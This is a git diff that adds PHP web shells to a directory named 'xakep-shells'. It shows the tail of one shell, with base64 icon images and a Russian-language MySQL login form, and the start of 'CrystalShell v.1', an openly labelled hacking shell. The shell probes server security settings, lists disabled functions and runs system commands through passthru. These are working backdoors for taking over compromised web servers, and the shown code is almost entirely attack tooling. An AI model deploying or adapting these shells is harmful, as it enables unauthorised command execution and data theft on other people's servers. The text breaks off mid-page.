+"AIAAAAD//wAAAAAAAAAAAAAAAAAAAARqcMlBKxUyz8B7EJi2DF4nfCIJgiTgAtl6BoNAUvBik0RP".
+"2zTYSQDgKQif00Co4ggKhRMgqKM4AwWE1MacTaFRAFdCpHEMBARBvCQ7SYY4cewmDtCFg4uo2REP".
+"Bwh6fBovAAkHCYYihS4iEQA7",
+"ext_nfo"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_ocx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAIAAAP8AAP//AAAA/wD/AACAAAAAgICA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARKMMlJq704620AQlMQAABlFMAwlIEgEESZnKg6tEJwwOVZ".
+"IjfXKLHryRK4oaRDJByQwlQP1SQkUypAgdpsDYErruRAOpaPm7Q6HQEAOw==",
+"ext_pcx"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pif"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAEO/DISasEOGuNDkJMeDDjGH7HpmYd9jwazKUybG+tvOlA7gK1mYv3w7RW".
+"mJRRiRQ2Z5+odNqxWK/YrDUCADs=",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_png"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_reg"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgACAgMDAwAD//wAAAAAAAANM".
+"aCrcrtCIQCslIkprScjQxFFACYQO053SMASFC6xSEQCvvAr2gMuzCgEwiZlwwQtRlkPuej2nkAh7".
+"GZPK43E0DI1oC4J4TO4qtOhSAgA7",
+"ext_rev"=>
+"R0lGODlhEAAQAFUAACH5BAEAAD8ALAAAAAAQABAAhQAAAOvz+////1gdAFAAANDY4IYCU/9aZJIC".
+"Wtvi7PmyheLq8xE2AAAyUNTc5DIyMr7H09jf5/L5/+Dg8PX6/4SHl/D4/5OXpKGmse/2/ZicqPb6".
+"/28aIBlOAMHI0MzU3MXFHjJQAOfu9d7k7gA4Xv//sRVDAI0GUY0CU+Hn8ABbjfFwOABMfwhfL/99".
+"0v+H1+hatf9syvRjwP+V3gA4boCAAABQhf+j5f++8P950FBQAN/n8PD2/HNzAABilgAAAAaRwIFw".
+"SCz+MJpLhdMzOJ9PAqRQmJxKuNvs5crFZDBCwSIQcECItDqNIlAkGcejRqjb74C8fs8/JiskLD4e".
+"BRERCSMpIg1TVTYqAZGRPBsCCw1jZTSVZZ0CAZdvcQ+SBwqfn5d8pacBqX5KJgEHtAcrrTsMjRM6".
+"rKgLBQyZAiG+rh8tDKJyCc3OEQUdHQx81Xs/QQA7",
+"ext_rmi"=>
+"R0lGODlhFAAUAKL/AAAAAH8Af//4/8DAwL+/v39/fwAAAAAAACH5BAEAAAMALAAAAAAUABQAQANS".
+"OLrcvkXIMKUg4BXCu8eaJV5C8QxRQAmqBTpFLM+nEk3qemUwXkmvxs3n4tWOyCRk5DKdhi0JYGpk".
+"QFm6oNWyylaXud8uxI2Oe8zig8puf5WNBAA7",
+"ext_rtf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_shtm"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_shtml"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAIdjI+pq+DAEIzpTXputLi9rmGc".
+"ETbgR3aZmrIlVgAAOw==",
+"ext_so"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_stl"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd".
+"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_sys"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ".
+"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ".
+"/aZBVOqkpUa/4KisRC6rEgA7",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_theme"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAAD/AAAA/wCAAAAA".
+"gAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_url"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7".
+"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk".
+"fRQRADs=",
+"ext_vbe"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMAAAP8AAAAAAAAAAAADRii63CEgxibH".
+"kwDWEK3OACF6nDdhngWYoEgEMLde4IbS7SjPX93JrIwiIJrxTqTfERJUHTODgSAQ3QVjsZsgyu16".
+"seAwLAEAOw==",
+"ext_vbs"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAICAgMDAwAD//wCAgAAAAAAAAAAAAANQ".
+"GLrcECXGJsWTJYyybbTQVBAkCBSgyKGPl2YjCcwnG2qrV13TQBI6GwbXqb0yCgCJJYSZOK4LZPDY".
+"DHSvgEAQAGxrzQKNhgFtz+j0eM2eJQAAOw==",
+"ext_vcf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwICAAP//AAAA/4CAgIAAAAAAgP//".
+"//8AAAAAAAAAAAAAAAAAAAAAAAAAAARYUElAK5VY2X0xp0LRTVYQAMWZaZWJAMJImiYVhEVmu7W4".
+"srfeSUAUeFI10GBJ1JhEHcEgNiidDIaEQjqtAgiEjQFQXcK+4HS4DPKADwey3PjzSGH1VTsTAQA7",
+"ext_wav"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wma"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_wmf"=>
+"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA".
+"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q".
+"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3".
+"EzWCgwARADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7",
+"ext_xsl"=>
+"R0lGODlhEAAQAEQAACH5BAEAABIALAAAAAAQABAAhAAAAPHx8f///4aGhoCAAP//ADNmmabK8AAA".
+"gAAAmQCAgDP//zNm/zOZ/8DAwDOZAAAA/zPM/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAV3oDSMZDlKqBgIa8sKzpAOr9s6gqzWPOADItZhpVAwhCvgIHBICBSCRQMh".
+"SAyVTZZiEXkgVlYl08loPCBUa0ApIBBWiDhSAHQXfLZavcAnABQGgYFJBHwDAAV+eWt2AAOJAIKD".
+"dBKFfQABi0AAfoeZPEkSP6OkPyEAOw=="
+);
+$imgequals = array(
+"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+"ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml"),
+"ext_htaccess"=>array("ext_htaccess","ext_htpasswd")
+);
+ ksort($arrimg);
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v)
+  {
+   if (in_array($img,$v)) {$img = $k;}
+  }
+  if (empty($arrimg[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($arrimg[$img]);
+ }
+ else
+ {
+  echo  "<center>";
+  $k = array_keys($arrimg);
+  foreach ($k as $u)
+  {
+   echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";
+  }
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about")
+{
+ $dàta = "Any stupid copyrights and copylefts";
+ echo $data;
+}
+
+$microtime = round(getmicrotime()-$starttime,4);
+?>
+
+<html>
+<head>
+</head>
+<body>
+<center> <br><br>
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+	<col width=1>
+	<col width=600>
+	<col width=1>
+	<tr> <td></td>
+		 <td align=left class=texte>
+		 <br> <form action='' method='post'> <input type='hidden' name='action' value='connect'>
+		   <table border=0 align=center>
+		   <col>
+		   <col align=left>
+		   <tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>
+		   Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!<br><br>
+		   		</td>
+		   </tr>
+		   <tr> <td class=texte>Àäðåñ ñåðâåðà:</td>
+		   		<td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+		   </tr>
+		   <tr> <td class=texte>Íàçâàíèå áàçû:</td>
+		   		<td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+		   </tr>
+		   <tr> <td class=texte>Ëîãèí:</td>
+		   		<td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+		   </tr>
+		   <tr> <td class=texte>Ïàðîëü</td>
+		   		<td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+		   </tr>
+		   </table>
+		   <br> <center> <br><br>
+		   <input type='submit' value=' Ïîäêëþ÷èòñÿ ' class=form></center> </form> <br><br>
+		   </td>
+		   		<td></td>
+			</tr>
+			<tr> <td height=1 colspan=3></td>
+		  </tr>
+		  </table> </center>
+		  </body>
+		  </html>
+
diff --git a/xakep-shells/PHP/crystal.txt b/xakep-shells/PHP/crystal.txt
new file mode 100644
index 0000000..ae925d5
--- /dev/null
+++ b/xakep-shells/PHP/crystal.txt
@@ -0,0 +1,1127 @@
+<?
+
+
+
+
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
+/**********************************************************/
+/*                          CrystalShell v.1
+/*                       --------- ----------
+/*
+/*       Coded by : Super-Crystal and Mohajer22
+/*    ------------------------------------------------
+/*    Arab Security Center Team <---thanks
+/*      mail : sup3r-hackers@hotmail.Com
+/* october73 shell & CrystalShell < coding by super crystal
+/*
+/*********************************************************/
+?>
+<?$dir=realpath("./")."/";
+$dir=str_replace("\\","/",$dir);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><meta http-equiv="Content-Language" content="ar-sa"><title>
+Crystal shell</title>
+<style type='text/css'> body {	background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
+SCROLLBAR-BASE-COLOR: black;    CURSOR: crosshair;    color:   #1CB081; }    img
+{background-color:   #FFFFFF   !important}  input  {background-color:   #303030
+!important} option {  background-color:   #303030   !important}         textarea
+{background-color: #303030 !important} input {color: #1CB081 !important}  option
+{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
+{background-color: #303030 !important} select {font-weight: normal;       color:
+#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
+background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
+0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
+!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
+!important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
+!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
+normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
+{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;
+color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
+font-weight:bold; font-style: italic;}-->
+  </style>
+  <![endif]-->
+<meta http-equiv=Content-Language content=ar>
+<!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+ <style>
+<!--
+body { scrollbar-face-color: #000000; scrollbar-shadow-color: #CC0000; scrollbar-highlight-color: #CC0000; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000; scrollbar-arrow-color: #ffffff }
+-->
+</style>
+<style> 
+<!-- 
+#leftright, #topdown{ 
+position:absolute; 
+left:0; 
+top:0; 
+width:1px; 
+height:1px; 
+layer-background-color:limegreen; 
+background-color:red; 
+z-index:100; 
+font-size:1px; 
+} 
+--> 
+</style>
+
+</head>
+  </head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0 style="color:#DCE7EF">
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr>
+	<th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2" bgcolor="#000000">
+<p align="center">&nbsp;</p>
+	<p align="center">
+<a bookmark="minipanel">
+	<font face="Webdings" size="7" color="#DCE7EF">ö</font></a><font size="7" face="Martina">CRYSTAL-H</font><span lang="en-us"><font size="3" face="Martina"> </font>
+	<font size="1" face="Arial">Crystal hack shellphp</font></span><font color="#FFFF00" face="Arial" size="1">&nbsp;<span lang="en-us">2006-2007</span></font></p>
+</p>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+<p align="center">
+	<b>
+	<?
+	$dirfile="$file_to_download";
+if (file_exists("$dirfile"))
+{
+header("location: $dirfile");
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+
+
+}
+
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() b&#7883; c&#7845;m";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo("<br>");
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo("<br>");
+echo "PHP version: <b>".@phpversion()."</b>";
+echo("<br>");
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<b>
+</b></p>
+	<p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+
+</p>
+	<p align="center"><font color="#FFFF00">&nbsp;</font></p>
+	<p align="center"></p>
+	</th></tr><tr>
+		<td bgcolor="#000000" style="color: #DCE7EF">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font size="4px">
+<b>
+		<font size="1" face="Verdana" color="#DCE7EF">OS:</font><font color="#DCE7EF" size="-2" face="verdana"><font size="1" face="Arial">&nbsp;<?php echo php_uname(); ?>&nbsp;</font></span></font></b><p>
+<font size="1" face="Verdana" color="#DCE7EF">Server:</font><font color="#DCE7EF" size="1" face="Arial">&nbsp;</font><font color="#DCE7EF" size="1" face="Arial"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?>&nbsp;</font></font>
+</font>
+</p>
+</font>
+<font size=1 face=Verdana>
+<p><font color="#DCE7EF">User</font></font><font size="1" face="Verdana" color="#DCE7EF">:</font><font size=-2 face=verdana color="#00000"> </font>
+</b>
+	</font>
+	</font>
+	<a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none">
+<font size=-2 face=verdana color="#FFFFFF">
+<? passthru("id");?></font><font size=-2 face=verdana color="black"><br>
+	</font>
+</a><span lang="en-us"><font face="Wingdings" size="3" color="#FFFFFF">1</font></span><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><font size="-2" face="verdana"><font size=-2 face=Verdana color="#DCE7EF">:</font><font size=-2 face=verdana color="#DCE7EF">
+<? echo getcwd();?></div></font></font></a></font></b></a></font><br>
+
+<br>&nbsp;<b><font size="4px"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000" face="Verdana" size="-2">
+&nbsp;</font></a></font><font size="4px"><font size=-2 face=verdana></a><font face="Verdana" size="-2">&nbsp;</font></font></font><a href=# onClick=location.href="javascript:history.back(-1)" style="color: white; text-decoration: none"><font face=Verdana><font color="#CC0000" size="3" face="verdana">Back</font><font color="#DCE7EF" size="1" face="verdana"> </font>
+
+	</font></a><font face="Wingdings" size="5" color="#C0C0C0">ð</font><span lang="en-us"><font size="5" color="#C0C0C0" face="Webdings">
+</font></span><font face="verdana" color="white"><font face=Verdana><font face=verdana color=white></font></font></font><font face=Verdana color="white"><a href=?action=phpinfo target=\"_blank\" style="color: white; text-decoration: none"><font color="#CC0000" size="3"><a target="\&quot;_blank\&quot;" style="text-decoration: none" title="ãÚáæãÇÊ ÇáÜPhp" href="?action=phpinfo"><font color="#CC0000">phpinfo</font></a></font></a></font></b><span lang="en-us"><font color="#C0C0C0" face="Wingdings" size="5">2</font></span><b><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
